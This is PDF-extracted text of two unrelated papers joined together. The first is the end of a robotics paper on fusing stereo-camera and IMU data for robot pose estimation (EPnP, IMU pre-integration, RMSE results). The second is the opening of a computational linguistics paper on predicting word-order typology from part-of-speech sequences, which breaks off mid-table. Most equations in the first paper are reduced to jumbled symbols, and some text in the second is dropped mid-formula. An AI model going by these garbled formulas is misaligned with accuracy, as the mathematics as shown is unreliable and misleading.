2 ) (1 ) 2 ( 2 ) corrected corrected x x k r k r k r p xy p r x y y k r k r k r p xy p r y                  In summary, the parameters describing the camera model mainly include: in the camera's internal parameter matrix, and distortion correction parameters. C. Stereo camera ranging principle The binocular camera generally consists of two pinhole cameras placed horizontally, and the two cameras observe an object together. The aperture centers of both cameras are located on one axis, and the distance between the two is called the baseline b of the binocular camera. There is an existing space point P , which is an image in the left-eye camera and the right-eye camera, and is denoted as , L R P P . Due to the presence of the camera baseline, these two imaging positions are different. Remember that the coordinates of the imaging on the left and right sides are , L R x x , which can be seen from the similarity of the triangles:  L R b u uz f z b      We can get:  fb z d    The above model is an ideal model, which aims to explain the principle of measuring the actual three-dimensional point depth of the binocular camera. In practical applications, due to factors such as manufacturing and installation, it is difficult to achieve that the imaging planes of the binocular cameras are strictly on the same plane and the optical axes are strictly parallel. Therefore, before using a binocular camera for measurement, it should be calibrated to obtain the left and right camera internal parameters and the relative position relationship between the left and right cameras. III. POSE ESTIMATION ALGORITHM At present, the fusion method of monocular vision sensor and IMU can be divided into two types: loose coupling and tight coupling[1]. Loose coupling is based on the vision sensor and IMU as two separate modules, both of which can calculate the pose information, and then fused by EKF[2] and so on. Tight coupling refers to the non-linear optimization of vision and IMU data to obtain pose estimates. Because tight coupling can make full use of each sensor's data, this paper uses tight coupling to fuse vision and IMU data. Firstly, the purely visual feature point pose estimation method is used to estimate the camera pose. Then, during the camera movement, if the number of extracted feature points is less than a certain threshold value, the camera movement cannot be estimated or the estimated camera rotation and translation are greater than a certain threshold value, The camera pose is estimated by fusing the IMU, otherwise feature points are still used to estimate the camera pose. A. Pose estimation using pure visual information The ORB (Oriented Fast and rotated Brief) algorithm was proposed by Ethan Rublee et al. In 2011[3]. The ORB feature is composed of the FAST International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 51 feature and the BRIEF descriptor. It adds orientation and scale invariance to the FAST feature. Features are described using binary BRIEF descriptors. When performing feature matching, the descriptors between feature points and feature points are compared. The binocular camera can directly obtain the corresponding 3D position of the pixel under the known pixel matching of the left and right camera images. Therefore, the stereo camera-based SLAM system can use the known 3D point and its projection match in the current frame to obtain the current camera pose without the need to solve camera motion using epipolar geometry[4]. This paper first uses the method of EPnP[5] to solve the camera pose. The EPnP pose solution method can more effectively use the matching point information, and iteratively optimize the camera pose. EPnP is known as the coordinates  , 1, 2,...,wiP i n of n space points in the world coordinate system and their corresponding coordinates  , 1, 2,...,ciP i n in the image coordinate system to solve the rotation matrix R and translation vector t of the camera movement.Set four non-coplanar virtual control points in the world coordinate system, whose homogeneous sitting marks are:  | 1, 2, 3, 4wiC i  .The relationship between the world coordinates of the space points and the control points is as follows:  4 4 1 1 , 1 w w i ij j ij j j P C with          Once thevirtual control point is determined and the premise that the four control points are not coplanar,  , 1,..., 4ij j  is the only one determined.In the image coordinate system, the same weighting sum relationship exists: 4 1 c c i ij j j P C    Substituting equation (13) into the camera model gives:  4 4 1 1 0 , 0 1 0 0 1 c i x x j c c c i i i j y y ij j j j c j u f c x i s v P C f c y z                                   K K  The image coordinates , i i u v in Equation (13) are known, so:  4 1 c i ij j j s z      From equations (13) and (14):  4 1 4 1 ( ) 0 ( ) 0 c c ij x j ij x i j j c c ij y j ij y i j j f x c u z f y c v z                       In order to obtain the coordinates of the 2D point into the camera coordinate system, it is assumed that ij  in the camera coordinate system is consistent with ij  in the world coordinate system, that is, to find the rotation and translation of the four control points. Solve linear equations:  0MX   Among them, M is a 2 12n matrix, and 1 2 3 4 [ , , , ] cT cT cT cT C C C CX is a vector composed of 12 unknowns to be solved.  1 N i i i v   X   International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 52 i v is the right singular vector of M, and the corresponding singular value is 0. Solve the TM M eigen value and eigenvector. The eigenvector with eigenvalue of 0 is i v . N is the dimension of the T M M space, and i  is the coefficient to be determined. Depending on the position of the reference point, the spatial dimension of the matrix TM M may take the values 1,2,3,4. According to the same distance between the control points in the world coordinate system and the camera coordinate system, six constraints can be obtained, and the pending coefficients can be solved. When N = 1, according to the constraints:      2 2 i j w w i j v v C C      and so：  [ ] [ ] [ , ] [1,4] 2 [ ] [ ] [ , ] [1,4] i j w w i ji j i j i j v v C C v v            When N = 2:  2 2 [ ] [ ] [ ] [ ] 1 1 2 2 1 1 2 2 ( ) i i j j w w i j v v v v C C         Since 1  and 2  only appear in the equation as quadratic terms, let 2 2 1 1 2 2 [ , , ] T    β , and use the vector ρ to represent all 2 w w i j C C , thus obtaining the equation:  Lβ = ρ   Where L is a 6 3 matrix composed of 1 v and 2 v . When N = 3, L is a 6 6 matrix. In summary, the coordinate solution of the reference point in the camera coordinate system can be obtained as the initial value of the optimization, the optimization variable is 1 2 [ , ,..., ] T N   β , and the objective function is:  2 2 ( , ) . . ( ) ( ) c c w w i j i j i j s t i j Error C C C C     β   Optimize β corresponding to the smallest dimension of the error, get the vector X , and restore the coordinates of the control point in the camera coordinate system. At the same time, the coordinates of the reference point in the camera coordinate system are obtained according to the centroid coordinate coefficient. Finally, according to the coordinates of a set of point clouds in the two coordinate systems, the pose transformations of the two coordinate systems are obtained. The solution steps are as follows: a) Find the center point:  , c w i ic w c c p p p P n n       b) To the center point:  , c c c w w w i i c i i c q p p q p p      c) Calculate the H matrix:  1 T n c w i i i q q   H   d) SVD decomposition of H matrix:  T  H U V   e) Calculate the rotation R:  T R UV   If R <0, then R(2,.) =-R(2,0). International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 53 f) Calculate displacement t:  0 0 c w t p p  R   Taking the results of EPnP solution as initial values, the method of g2o was used to optimize the pose of the camera nonlinearly. Construct the least squares problem and find the best camera pose:  2 * ^ 1 2 1 1 arg min exp( ) 2 n i i i i u K P s        Among them, i u is the pixel coordinates of the projection point, K is the camera internal reference,  is the camera pose, and i P is the space point coordinate. B. Camera pose estimation method based on IMU The measurement frequency of the IMU is often higher than the frequency at which the camera collects pictures. For example, the binocular camera used in this article has a frame rate of up to 60FPS and an IMU frequency of up to 500Hz. The difference in frequency between the two results in multiple IMU measurements between the two frames. Therefore, in order to ensure the information fusion of the two sensors, it is necessary to pre-integrate [6] the data of the IMU. That is, only the IMU information between the two image moments is integrated to obtain the relative pose value, and the integration result is saved for later joint optimization.The IMU-based camera pose estimation method mainly includes three coordinate systems: the world coordinate system, the IMU coordinate system, and the camera coordinate system. All pose and feature point coordinates are finally expressed in the world coordinate system. During the calculation process, this article will convert the state quantity in the camera coordinate system to the IMU coordinate system, and then to the world coordinate system.In this article, the letter W is used to represent the world coordinate system, the letter B is used to represent the IMU coordinate system, WB R is used to represent the rotation matrix from the IMU coordinate system to the world coordinate system, and WB p is used to represent the translation matrix from the IMU coordinate system to the world coordinate system. The acceleration and angular velocity of the IMU are:  ( ) ( ) ( ) ( ) a ( ) ( )( a( ) ) ( ) ( ) g g B WB B WB T a a B WB WB W W t t b t t t R t t g b t t              Among them, ( )ab t and ( )gb t represent the bias of the accelerometer and gyroscope respectively, ( )a t and ( )g t represent the noise of the accelerometer and gyroscope respectively, and W g represents the gravity vector in the world coordinate system. The derivatives of rotation, velocity, and translation are expressed as:  ^ WB WB B WB W WB W WB W WB W WB R R v a p v      The rotation, speed and translation in the world coordinate system can be obtained by the general integral formula:  2 ( ) ( ) ( ( ) ) ( ) ( ) a( ) ( ) ( ) ( ) a( ) t t WB WB B WB t t t W W W t t t t t W W W W t t R t t R t Exp d v t t v t d p t t p t v d d                               Use Equation (32) in discrete time for Euler integration: International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 54  2 ( ) ( ) ( ( ) ) ( ) ( ) a( ) 1 ( ) ( ) ( ) a( ) 2 WB WB B WB W W W W W W W R t t R t Exp t t v t t v t t t p t t p t v t t t t                   The IMU model is obtained from equations (30) and (33): 2 2 ( ) ( ) (( ( ) ( ) ( ) ) ( ) ( ) ( )(a( ) ( ) ( )) 1 1 ( ) ( ) ( ) ( )(a( ) ( ) ( )) 2 2 g gd a ad a ad R t t R t Exp t b t t t v t t v t g t R t t b t t t p t t p t v t t g t R t t b t t t                               Suppose there are two image frames with time i t and j t , j i t t . Therefore, the IMU's pre-integration observation model is:  2 ( ) ( ) 1 ( ) 2 T ij i j ij T ij i j i ij ij T ij i j i i ij ij ij R R R Exp v R v v g t v p R p p v t g t p                      Among them, A, B, and C are the noise terms of the rotation amount, the pre-integrated speed noise term, and the pre-integrated translation noise term, respectively. For the pose between two adjacent frames, this paper still uses a nonlinear optimization method to fuse IMU information and visual information. Among them, the state quantities that need to be optimized are:   , , , ,j j j j jWB W B W B g aR p v b b    In equation (36), j WB R , j WB v , and j WB p are the rotation, velocity, and translation of the IMU coordinate system relative to the world coordinate system at time i, and the random walk bias of the gyroscope and accelerometer at time i, respectively. Therefore, the optimal state quantity  is solved by optimizing the visual reprojection error and the IMU measurement error:  * ( , arg min( + ( , )) proj k j IMU k E E i j     ）   C. Experimental design The upper computer of the experimental platform in this article is a laptop with Ubuntu 16.04 version, running memory is 8G, processor model is CORE i5 8250U, and the main frequency is 1.6GHz. The robot platform is a Dashgo D1 robot mobile platform that supports the ROS development system. The overall size is 406 210  and the diameter of the driving wheel is 125mm. The binocular camera sensor used is MYNT EYE D1000-IR-120/Color. The experiments in this paper are mainly aimed at the positioning accuracy of the robot. The evaluation index is the RMSE (root-mean-square-error) of the robot position:  2 1 1 ˆ( ) N i i i RMSE p p N      Where ˆ i p is the estimated robot position and i p is the actual robot position. Figure 2. Robot Straight Driving Positioning Experiment International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 55 In this paper, robot positioning experiments are performed in corridor environments with insignificant environmental characteristics and indoor environments with rich characteristics. In a corridor environment, a mobile robot is used to carry experimental equipment to travel at a constant speed of 10m in the positive direction of the camera, and then the positioning accuracy of pure vision and the positioning accuracy of vision fusion IMU are recorded separately. In a feature-rich indoor environment, a robot linear experiment was also performed to make the mobile robot move forward at a constant speed of 5m in the positive direction of the camera, but the speed was 2.5 times that of the previous experiment. Perform multiple experiments and record the results. TABLE I. EXPERIMENTAL RESULT Robot operating environment Pure visual RMSE/m Visual fusion IMU RMSE/m Low-texture corridor environment 0.0746 0.02122 Feature-rich environment 0.1024 0.06502 From the experimental results, it can be seen that the stereo vision positioning error of the fusion IMU is less than the pure vision positioning error, which indicates that the visual positioning of the robot with the fusion IMU is more accurate than the vision-only positioning in low-texture environments and fast robot movements. degree. IV. CONCLUSION In this paper, the robot positioning technology in the robot system is researched, and a binocular vision fusion IMU-based robot positioning method is proposed. Compared with the pure vision robot localization method, the proposed method is more robust in low-textured environments and fast robot movements. The experimental results show that the visual positioning method integrated with IMU solves the defects of pure visual positioning to a certain extent and improves the positioning accuracy of the robot. REFERENCE [1] Agostino Martinelli. Closed-Form Solution of Visual-Inertial Structure from Motion[J]. International Journal of Computer Vision, 2014, 106(2):138-152. [2] Smith R C, Cheeseman P. On the representation and estimation of spatial uncertainty[J]. International Journal of Robotics Research, 1986, 5(4): 56-68. [3] Rublee E, Rabaud V, Konolige K, et al. ORB: An efficient alternative to SIFT or SURF[C]// 2011 International Conference on Computer Vision. IEEE, 2012. [4] Gao Xiang, Zhang Tao. Fourteen lectures on visual SLAM [M]. Beijing: Publishing House of Electronics Industry, 2017. [5] V. Lepetit, F. Moreno-Noguer, P. Fua. EPnP:An accurate o(n) solution to the pnp problem[J]. International Journal of Computer Vision,2008,81(2):155-166. [6] Forster C, Carlone L, Dellaert F, et al. On-Manifold Preintegration for Real Time Visual--Inertial Odometry[J]. IEEE Transactions on Robotics, 2017, 33(1):1-21. work_aawrwejmaregji2stj32j4azfq ---- Fine-Grained Prediction of Syntactic Typology: Discovering Latent Structure with Supervised Learning Dingquan Wang and Jason Eisner Department of Computer Science, Johns Hopkins University {wdd,eisner}@jhu.edu Abstract We show how to predict the basic word-order facts of a novel language given only a cor- pus of part-of-speech (POS) sequences. We predict how often direct objects follow their verbs, how often adjectives follow their nouns, and in general the directionalities of all depen- dency relations. Such typological properties could be helpful in grammar induction. While such a problem is usually regarded as unsu- pervised learning, our innovation is to treat it as supervised learning, using a large collec- tion of realistic synthetic languages as train- ing data. The supervised learner must identify surface features of a language’s POS sequence (hand-engineered or neural features) that cor- relate with the language’s deeper structure (la- tent trees). In the experiment, we show: 1) Given a small set of real languages, it helps to add many synthetic languages to the training data. 2) Our system is robust even when the POS sequences include noise. 3) Our system on this task outperforms a grammar induction baseline by a large margin. 1 Introduction Descriptive linguists often characterize a human language by its typological properties. For instance, English is an SVO-type language because its basic clause order is Subject-Verb-Object (SVO), and also a prepositional-type language because its adpositions normally precede the noun. Identifying basic word order must happen early in the acqui- sition of syntax, and presumably guides the initial interpretation of sentences and the acquisition of a finer-grained grammar. In this paper, we propose a method for doing this. While we focus on word order, one could try similar methods for other typo- logical classifications (syntactic, morphological, or phonological). The problem is challenging because the lan- guage’s true word order statistics are computed from syntax trees, whereas our method has access only to a POS-tagged corpus. Based on these POS se- quences alone, we predict the directionality of each type of dependency relation. We define the direc- tionality to be a real number in [0, 1]: the fraction of tokens of this relation that are “right-directed,” in the sense that the child (modifier) falls to the right of its parent (head). For example, the dobj relation points from a verb to its direct object (if any), so a di- rectionality of 0.9—meaning that 90% of dobj de- pendencies are right-directed—indicates a dominant verb-object order. (See Table 1 for more such exam- ples.) Our system is trained to predict the relative frequency of rightward dependencies for each of 57 dependency types from the Universal Dependencies project (UD). We assume that all languages draw on the same set of POS tags and dependency relations that is proposed by the UD project (see §3), so that our predictor works across languages. Why do this? Liu (2010) has argued for using these directionality numbers in [0, 1] as fine-grained and robust typological descriptors. We believe that these directionalities could also be used to help de- fine an initializer, prior, or regularizer for tasks like grammar induction or syntax-based machine trans- lation. Finally, the vector of directionalities—or the feature vector that our method extracts in or- der to predict the directionalities—can be regarded as a language embedding computed from the POS- tagged corpus. This language embedding may be useful as an input to multilingual NLP systems, such as the cross-linguistic neural dependency parser of Ammar et al. (2016). In fact, some multilingual NLP systems already condition on typological properties looked up in the World Atlas of Language Struc- tures, or WALS (Dryer and Haspelmath, 2013), as 147 Transactions of the Association for Computational Linguistics, vol. 5, pp. 147–161, 2017. Action Editor: Mark Steedman. Submission batch: 11/2016; Revision batch: 2/2017; Published 6/2017. c©2017 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. Typology Example Verb-Object (English) She gave me a raise dobj Object-Verb (Hindi) She me a raise gave vah mujhe ek uthaane diya dobj Prepositional (English) She is in a car case Postpositional (Hindi) She a car in is vah ek kaar mein hai case Adjective-Noun (English) This is a red car amod Noun-Adjective (French) This is a car red Ceci est une voiture rouge amod Table 1: Three typological properties in the World Atlas of Lan- guage Structures (Dryer and Haspelmath, 2013), and how they affect the directionality of Universal Dependencies relations. we review in §8. However, WALS does not list all properties of all languages, and may be somewhat inconsistent since it collects work by many linguists. Our system provides an automatic alternative as well as a methodology for generalizing to new properties. More broadly, we are motivated by the chal- lenge of determining the structure of a language from its superficial features. Principles & Parame- ters theory (Chomsky, 1981; Chomsky and Lasnik, 1993) famously—if controversially—hypothesized that human babies are born with an evolutionarily tuned system that is specifically adapted to natural language, which can predict typological properties (“parameters”) by spotting telltale configurations in purely linguistic input. Here we investigate whether such a system can be tuned by gradient descent. It is at least plausible that useful superficial features do exist: e.g., if nouns often precede verbs but rarely follow verbs, then the language may be verb-final. 2 Approach We depart from the traditional approach to latent structure discovery, namely unsupervised learning. Unsupervised syntax learners in NLP tend to be rather inaccurate—partly because they are failing to maximize an objective that has many local optima, and partly because that objective does not capture all the factors that linguists consider when assigning syntactic structure. Our remedy in this paper is a su- pervised approach. We simply imitate how linguists have analyzed other languages. This supervised ob- jective goes beyond the log-likelihood of a PCFG- like model given the corpus, because linguists do not merely try to predict the surface corpus. Their de- pendency annotations may reflect a cross-linguistic theory that considers semantic interpretability and equivalence, rare but informative phenomena, con- sistency across languages, a prior across languages, and linguistic conventions (including the choice of latent labels such as dobj). Our learner does not consider these factors explicitly, but we hope it will identify correlates (e.g., using deep learning) that can make similar predictions. Being supervised, our objective should also suffer less from local optima. Indeed, we could even set up our problem with a convex objective, such as (kernel) logistic regres- sion, to predict each directionality separately. Why hasn’t this been done before? Our set- ting presents unusually sparse data for supervised learning, since each training example is an en- tire language. The world presumably does not offer enough natural languages—particularly with machine-readable corpora—to train a good classi- fier to detect, say, Object-Verb-Subject (OVS) lan- guages, especially given the class imbalance prob- lem that OVS languages are empirically rare, and the non-IID problem that the available OVS lan- guages may be evolutionarily related.1 We miti- gate this issue by training on the Galactic Depen- dencies treebanks (Wang and Eisner, 2016), a col- lection of more than 50,000 human-like synthetic languages. The treebank of each synthetic language is generated by stochastically permuting the sub- trees in a given real treebank to match the word or- der of other real languages. Thus, we have many synthetic languages that are Object-Verb like Hindi but also Noun-Adjective like French. We know the true directionality of each synthetic language and we would like our classifier to predict that directional- ity, just as it would for a real language. We will show that our system’s accuracy benefits from fleshing out the training set in this way, which can be seen as a form of regularization. 1Properties shared within an OVS language family may ap- pear to be consistently predictive of OVS, but are actually con- founds that will not generalize to other families in test data. 148 A possible criticism of our work is that obtaining the input POS sequences requires human annotators, and perhaps these annotators could have answered the typological classification questions as well. In- deed, this criticism also applies to most work on grammar induction. We will show that our system is at least robust to noise in the input POS sequences (§7.4). In the future, we hope to devise similar meth- ods that operate on raw word sequences. 3 Data We use two datasets in our experiment: UD: Universal Dependencies version 1.2 (et al., 2015) A collection of dependency treebanks for 37 languages, annotated in a consistent style with POS tags and dependency relations. GD: Galactic Dependencies version 1.0 (Wang and Eisner, 2016) A collection of projective de- pendency treebanks for 53,428 synthetic languages, using the same format as UD. The treebank of each synthetic language is generated from the UD treebank of some real language by stochastically permuting the dependents of all nouns and/or verbs to match the dependent orders of other real UD lan- guages. Using this “mix-and-match” procedure, the GD collection fills in gaps in the UD collection— which covers only a few possible human languages. 4 Task Formulation We now formalize the setup of the fine-grained typo- logical prediction task. Let R be the set of universal relation types, with N = |R|. We use r→ to denote a rightward dependency token with label r ∈R. Input for language L: A POS-tagged corpus u. (“u” stands for “unparsed.”) Output for language L: Our system predicts p(→| r,L), the probability that a token in language L of an r-labeled dependency will be right-oriented. It predicts this for each dependency relation type r ∈ R, such as r = dobj. Thus, the output is a vector of predicted probabilities p̂ ∈ [0, 1]N . Training: We set the parameters of our system using a collection of training pairs (u,p∗), each of which corresponds to some UD or GD training lan- guage L. Here p∗ denotes the true vector of proba- bilities as empirically estimated from L’s treebank. Evaluation: Over pairs (u,p∗) that correspond to held-out real languages, we evaluate the expected loss of the predictions p̂. We use ε-insensitive loss2 with ε = 0.1, so our evaluation metric is ∑ r∈R p∗(r | L) · lossε(p̂(→| r,L),p∗(→| r,L)) (1) where • lossε(p̂,p∗) ≡ max(|p̂−p∗|−ε, 0) • p∗(→| r,L) = countL( r→) countL(r) is the empirical esti- mate of p(→| r,L). • p̂(→| r,L) is the system’s prediction of p∗ The aggregate metric (1) is an expected loss that is weighted by p∗(r | L) = countL(r)∑ r′∈R countL(r ′) , to empha- size relation types that are more frequent in L. Why this loss function? We chose an L1-style loss, rather than L2 loss or log-loss, so that the ag- gregate metric is not dominated by outliers. We took ε > 0 in order to forgive small errors: if some pre- dicted directionality is already “in the ballpark,” we prefer to focus on getting other predictions right, rather than fine-tuning this one. Our intuition is that errors < ε in p̂’s elements will not greatly harm downstream tasks that analyze individual sentences, and might even be easy to correct by grammar rees- timation (e.g., EM) that uses p̂ as a starting point. In short, we have the intuition that if our pre- dicted p̂ achieves small lossε on the frequent relation types, then p̂ will be helpful for downstream tasks, although testing that intuition is beyond the scope of this paper. One could tune ε on a downstream task. 5 Simple “Expected Count” Baseline Before launching into our full models, we warm up with a simple baseline heuristic called expected count (EC), which is reminiscent of Principles & Pa- rameters. The idea is that if ADJs tend to precede nearby NOUNs in the sentences of language L, then amod probably tends to point leftward in L. After all, the training languages show that when ADJ and NOUN are nearby, they are usually linked by amod. Fleshing this out, EC estimates directionalities as p̂(→| r,L) = ecountL( r→) ecountL( r→) + ecountL( r←) (2) 2Proposed by V. Vapnik for support vector regression. 149 where we estimate the expected r← and r→ counts by ecountL( r→) = ∑ u∈u ∑ 1≤i 0, let the right window Wj denote the sequence of tags Tj+1, . . . ,Tj+w (padding this se- quence with additional # symbols if it runs past the end of j’s sentence). We define quantities πw t|s and πwt via (8)–(9), using a version of g(t | j) that mea- sures the fraction of tags in Wj that equal t. Also, for b ∈ {1, 2}, we define πw,b t|s and π w,b t using a ver- sion of g(t | j) that is 1 if Wj contains at least b tokens of t, and 0 otherwise. For each of these quantities, we also define a corresponding mirror-image quantity (denoted by negating w > 0) by computing the same feature on a reversed version of the corpus. We also define “truncated” versions of all quan- tities above, denoted by writing ˆ over the w. In these, we use a truncated window Ŵj, obtained from Wj by removing any suffix that starts with # 6In practice, we do backoff smoothing of these means. This avoids subsequent division-by-0 errors if tag t or s has count 0 in the corpus, and it regularizes πt|s/πt toward 1 if t or s is rare. Specifically, we augment the denominators by adding λ, while augmenting the numerator in (8) by adding λ ·meanj,t g(t | j) (unsmoothed) and the numerator in (9) by adding λ times the smoothed πt from (8). λ > 0 is a hyperparameter (see §7.5). . . . . . . f1 . . . . . . . . . . . . . . . f2 . . . soft-pooling . . . Figure 2: Extracting and pooling the neural features. or with a copy of tag Tj (that is, s).7 As an example, π 8̂,2 N|V asks how often a verb is followed by at least 2 nouns, within the next 8 words of the sentence and before the next verb. A high value of this is a plausi- ble indicator of a VSO-type or VOS-type language. We include the following features for each tag pair s,t and each w ∈ {1, 3, 8, 100, −1,−3,−8,−100, 1̂, 3̂, 8̂, ˆ100,−1̂,−3̂,−8̂,− ˆ100}:8 πwt , π w t|s, π w t|s ·π w s , π w t|s//π w t , π w t //π w t|s, π w t|s//π −w t|s where we define x//y = min(x/y, 1) to prevent unbounded feature values, which can result in poor generalization. Notice that for w = 1, πw t|s is bigram conditional probability, πw t|s·π w s is bigram joint prob- ability, the log of πw t|s/π w t is bigram pointwise mu- tual information, and πw t|s/π −w t|s measures how much more prevalent t is to the right of s than to the left. By also allowing other values of w, we generalize these features. Finally, our model also uses versions of these features for each b ∈ 1, 2. Neural features. As an alternative to the manu- ally designed π function above, we consider a neural approach to detect predictive configurations in the sentences of u, potentially including complex long- distance configurations. Linguists working with Principles & Parameters theory have supposed that a single telltale sentence—a trigger—may be enough 7In the “fraction of tags” features, g(t | j) is undefined ( 0 0 ) when Ŵj is empty. We omit undefined values from the means. 8The reason we don’t include π−w t|s //π w t|s is that it is in- cluded when computing features for −w. 151 to determine a typological parameter, at least given the settings of other parameters (Gibson and Wexler, 1994; Frank and Kapur, 1996). We map each corpus sentence ui to a finite- dimensional real vector fi by using a gated recur- rent unit (GRU) network (Cho et al., 2014), a type of recurrent neural network that is a simplified variant of an LSTM network (Hochreiter and Schmidhuber, 1997). The GRU reads the sequence of one-hot em- beddings of the tags in ui (including the boundary symbols #). We omit the part of the GRU that com- putes an output sequence, simply taking fi to be the final hidden state vector. The parameters are trained jointly with the rest of our typology prediction sys- tem, so the training procedure attempts to discover predictively useful configurations. The various elements of fi attempt to detect vari- ous interesting configurations in sentence ui. Some might be triggers (which call for max-pooling over sentences); others might provide softer evidence (which calls for mean-pooling). For generality, therefore, we define our feature vector π(u) by soft- pooling of the sentence vectors fi (Figure 2). The tanh gate in the GRU implies fik ∈ (−1, 1) and we transform this to the positive quantity f ′ik = fik+1 2 ∈ (0, 1). Given an “inverse temperature” β, define9 π β k = ( mean i (f ′ik) β )1/β (10) This πβk is a pooled version of f ′ ik, ranging from max-pooling as β →−∞ (i.e., does f ′ik fire strongly on any sentence i?) to min-pooling as β → −∞. It passes through arithmetic mean at β = 1 (i.e., how strongly does f ′ik fire on the average sentence i?), ge- ometric mean as β → 0 (this may be regarded as an arithmetic mean in log space), and harmonic mean at β = −1 (an arithmetic mean in reciprocal space). Our final π is a concatenation of the πβ vectors for β ∈ {−4,−2,−1, 0, 1, 2, 4}. We chose these β values experimentally, using cross-validation. Combined model. We also consider a model s(u) = αsH(u) + (1 −α) sN(u) (11) where sH(u) is the score assigned by the hand- feature system, sN(u) is the score assigned by the 9For efficiency, we restrict the mean to i ≤ 1e4 (the first 10,000 sentences). neural-feature system, and α ∈ [0, 1] is a hyperpa- rameter to balance the two. sH(u) and sN(u) were trained separately. At test time, we use (11) to com- bine them linearly before the logistic transform (6). This yields a weighted-product-of-experts model. 6.4 Training procedure Length thresholding. By default, our feature vec- tor π(u) is extracted from those sentences in u with length ≤ 40 tokens. In §7.3, however, we try con- catenating this feature vector with one that is ex- tracted in the same way from just sentences with length ≤ 10. The intuition (Spitkovsky et al., 2010) is that the basic word order of the language can be most easily discerned from short, simple sentences. Initialization. We initialize the model of (6)–(7) so that the estimated directionality p̂(→| r,L), re- gardless of L, is initially a weighted mean of r’s di- rectionalities in the training languages, namely p̄r ≡ ∑ L wL(r) p ∗(→| r,L) (12) where wL(r) ≡ p ∗(r|L)∑ L′ p ∗(r|L′) (13) This is done by setting V = 0 and the bias (bV )r = log p̄r 1−p̄r , clipped to the range [−10, 10]. As a result, we make sensible initial predictions even for rare re- lations r, which allows us to converge reasonably quickly even though we do not update the parame- ters for rare relations as often. We initialize the recurrent connections in the GRU to random orthogonal matrices. All other weight matrices in Figure 1 and the GRU use “Xavier initialization” (Glorot and Bengio, 2010). All other bias weight vectors are initialized to 0. Regularization. We add an L2 regularizer to the objective. When training the neural network, we use dropout as well. All hyperparameters (regularization coefficient, dropout rate, etc.) are tuned via cross- validation; see §7.5. Optimization. We use different algorithms in dif- ferent feature settings. With scoring functions that use only hand features, we adjust the feature weights by stochastic gradient descent (SGD). With scor- ing functions that include neural features, we use RMSProp (Tieleman and Hinton, 2012). 152 Train Test cs, es, fr, hi, de, it, la itt, no, ar, pt en, nl, da, fi, got, grc, et, la proiel, grc proiel, bg la, hr, ga, he, hu, fa, ta, cu, el, ro, sl, ja ktc, sv, fi ftb, id, eu, pl Table 2: Data split of the 37 real languages, adapted from Wang and Eisner (2016). (Our “Train,” on which we do 5-fold cross- validation, contains both their “Train” and “Dev” languages.) 7 Experiments 7.1 Data splits We hold out 17 UD languages for testing (Table 2). For training, we use the remaining 20 UD languages and tune the hyperparameters with 5-fold cross- validation. That is, for each fold, we train the system on 16 real languages and evaluate on the remaining 4. When augmenting the 16 real languages with GD languages, we include only GD languages that are generated by “mixing-and-matching” those 16 lan- guages, which means that we add 16 × 17 × 17 = 4624 synthetic languages.10 Each GD treebank u provides a standard split into train/dev/test portions. In this paper, we primarily restrict ourselves to the train portions (saving the gold trees from the dev and test portions to tune and evaluate some future grammar induction system that consults our typological predictions). For example, we write utrain for the POS-tagged sentences in the “train” portion, and p∗train for the empirical probabil- ities derived from their gold trees. We always train the model to predict p∗train from utrain on each train- ing language. To evaluate on a held-out language during cross-validation, we can measure how well the model predicts p∗train given utrain. 11 For our fi- 10Why 16×17×17? As Wang and Eisner (2016, §5) explain, each GD treebank is obtained from the UD treebank of some substrate language S by stochastically permuting the depen- dents of verbs and nouns to respect typical orders in the super- strate languages RV and RN respectively. There are 16 choices for S. There are 17 choices for RV (respectively RN), including RV = S (“self-permutation”) and RV = ∅ (“no permutation”). 11In actuality, we measured how well it predicts p∗dev given udev. That was a slightly less sensible choice. It may have harmed our choice of hyperparameters, since dev is smaller than train and therefore p∗dev tends to have greater sampling er- ror. Another concern is that our typology system, having been specifically tuned to predict p∗dev, might provide an unrealisti- cally accurate estimate of p∗dev to some future grammar induc- tion system that is being cross-validated against the same dev set, harming that system’s choice of hyperparameters as well. Architecture ε-insensitive loss Scoring Depth UD +GD EC - 0.104 0.099 sH 0 0.057 0.037* sH 1 0.050 0.036* sH 3 0.060 0.048 sN 1 0.062 0.048 αsH + (1 −α) sN 1 0.050 0.032* Table 3: Average expected loss over 20 UD languages, com- puted by 5-fold cross-validation. The first column indicates whether we score using hand-engineered features (sH), neural features (sN), or a combination (see end of §6.3). As a baseline, the first line evaluates the EC (expected count) heuristic from §5. Within each column, we boldface the best (smallest) re- sult as well as all results that are not significantly worse (paired permutation test by language, p < 0.05). A starred result is significantly better than the other model in the same row. nal test, we evaluate on the 17 test languages using a model trained on all training languages (20 tree- banks for UD, plus 20 × 21 × 21 = 8840 when adding GD) with the chosen hyperparameters. To evaluate on a test language, we again measure how well the model predicts p∗train from utrain. 7.2 Comparison of architectures Table 3 shows the cross-validation losses (equa- tion (1)) that are achieved by different scoring ar- chitectures. We compare the results when the model is trained on real languages (the “UD” column) ver- sus on real languages plus synthetic languages (the “+GD” column). The sH models here use a subset of the hand- engineered features, selected by the experiments in §7.3 below and corresponding to Table 4 line 8. Although Figure 1 and equation (7) presented an “depth-1” scoring network with one hidden layer, Table 3 also evaluates “depth-d” architectures with d hidden layers. The depth-0 architecture simply pre- dicts each directionality separately using logistic re- gression (although our training objective is not the usual convex log-likelihood objective). Some architectures are better than others. We note that the hand-engineered features outperform the neural features—though not significantly, since they make complementary errors—and that com- bining them is best. However, the biggest benefit comes from augmenting the training data with GD languages; this consistently helps more than chang- ing the architecture. 153 ID Features Length Loss (+GD) 0 ∅ — 0.076 1 conditional 40 0.058 2 joint 40 0.057 3 PMI 40 0.039 4 asymmetry 40 0.041 5 rows 3+4 40 0.038 6 row 5+b 40 0.037 7 row 5+t 40 0.037 8* row 5+b+t 40 0.036 9 row 8 10 0.043 10 row 8 10+40 0.036 Table 4: Cross-validation losses with different subsets of hand- engineered features from §6.3. “∅” is a baseline with no fea- tures (bias feature only), so it makes the same prediction for all languages. “conditional” = πwt|s features, “joint” = π w t|s ·πws fea- tures, “PMI” = πwt|s//π w t and π w t //π w t|s features, “asymmetry” = πwt|s//π −w t|s features, “b” are the features superscripted by b, and “t” are the features with truncated window. “+” means con- catenation.The “Length” field refers to length thresholding (see §6.4). The 